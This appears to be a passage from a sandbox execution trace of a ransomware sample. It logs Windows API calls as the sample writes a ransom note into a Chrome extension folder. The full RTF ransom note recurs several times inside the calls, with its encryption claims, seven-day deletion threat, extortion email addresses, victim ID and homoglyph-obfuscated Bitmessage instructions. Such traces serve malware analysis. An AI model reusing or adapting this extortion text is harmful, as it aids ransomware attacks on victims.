scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n3ÉD\x8bÃ3ÉèsøÿÿH\x83Ä0[ÃÌÇD$\x10\x03\x15", lpUsedDefaultChar=0x0) returned 8717 [0281.177] WriteFile (in: hFile=0x2cc, lpBuffer=0x1ed55a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ed55a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0281.178] CloseHandle (hObject=0x2cc) returned 1 [0281.178] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\#readme_eman#.rtf")) returned 0xffffffff [0281.178] GetLastError () returned 0x2 [0281.178] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0281.637] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.637] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.637] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n 